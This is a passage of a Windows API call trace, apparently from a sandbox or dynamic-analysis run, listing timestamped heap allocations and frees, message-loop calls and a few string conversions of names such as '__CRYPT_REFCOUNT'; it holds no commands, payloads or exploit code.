(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0168.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0168.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0168.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0168.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0168.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0168.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0168.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0168.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0168.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0168.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0168.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0168.465] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0168.465] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0168.465] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0168.465] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0168.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0168.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0168.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0168.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0168.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0168.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0168.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0168.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0168.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0168.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0168.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0168.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0168.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0168.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0168.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0168.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0168.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0168.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0168.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0168.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0168.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0168.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0168.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0168.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0168.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0168.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0168.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0168.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0168.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0168.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0168.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x422e020 [0168.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0168.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0168.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0168.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0168.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0168.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0168.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0168.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0168.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0168.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0168.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0168.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0168.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4332020 [0169.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x422e020 | out: hHeap=0x970000) returned 1 [0169.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0169.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0169.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0169.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0169.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0169.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0169.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0169.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0169.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0169.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0169.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0169.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0169.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0169.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0169.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0169.093] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0169.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0169.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0169.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0169.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0169.093] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0169.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0169.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0169.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0169.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0169.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0169.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0169.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0169.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0169.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0169.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0169.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0169.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0169.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0169.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0169.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0169.095] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0169.095] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0169.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0169.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0169.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0169.095] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0169.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0169.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0169.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0169.096] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0169.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0169.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0169.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0169.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0169.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0169.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0169.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0169.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0169.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0169.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0169.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0169.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0169.096] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0169.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0169.097] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0169.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0169.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0169.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0169.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0169.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0169.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0169.097] RtlAllocateHeap (HeapHandle=0x970000, 